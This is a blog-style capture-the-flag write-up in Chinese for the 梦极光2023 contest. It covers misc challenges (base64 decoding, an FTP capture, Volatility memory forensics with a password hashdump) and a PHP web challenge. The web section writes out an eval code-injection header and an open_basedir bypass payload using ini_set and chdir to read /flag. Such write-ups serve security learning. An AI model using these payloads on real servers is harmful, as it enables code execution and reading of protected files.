azio7 blog

梦极光2023-writeup

misc

ONOFF

f12 查看网页源码可以看到明显可能是base64的编码

1700993229505

多次解密后得到flag

GUETCTF{W3lc0me_t0_th3_M1sc_w0rld}

1700993262300

ez_ez_Network

协议分级可以看到,主要数据传输是ftp协议

1700993413706

跟踪Sha_dong_dong.png 的ftp流

1700993494576

导出得到二维码

1700993534708

不是标准二维码,搜索得到

https://www.qrcode-tiger.com/zh-cn/different-types-of-qr-codes

1700993670509

与Han Xin 二维码高度相似

使用在线解密得flag

https://tuzim.net/hxdecode/

1700993748538

Somebody

内存取证,根据题目寻找桌面上的文件

vol -f Somebody.vmem windows.filescan.FileScan | grep Desktop

1700993846802

dump出anything.zip

vol -f Somebody.vmem windows.dumpfiles.DumpFiles --physaddr 0x7fa5e960

发现这个zip包有密码,排除伪加密后,在这个包里找到hint

1700993979094

于是导出用户的哈希密码

vol -f Somebody.vmem windows.hashdump.Hashdump

1700994049704

压缩包密码为P4rt01用户的 nthash 195f596c2120c7efd44ccef7e318a172

得到flag

1700994104726

web

get_my_flag

1700994464806

http头设置 GUETCTF: <你的公网出口ip>

根据题目提示

http头设置 HTTPSEC: eval($_GET[a]);

使用get参数a 输入需要执行的php语句

a=phpinfo();

1700994397709

可以查阅被禁用的函数,未禁用的有 var_dump scandir 等

本题还禁止目录穿越,无法直接读取根目录

https://www.v0n.top/2020/07/10/open_basedir%E7%BB%95%E8%BF%87/

使用此文章的方法绕过

读根目录 var_dump(scandir('glob:///*'));

1700994841460

可以看到flag文件的 /flag

由于 open_basedir 限制,无法直接读取flag文件

1700995080686

再利用文章的poc 利用ini_set()绕过

a=mkdir('Von');chdir('Von');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(include("/flag"));

即可读取到flag

1700995022543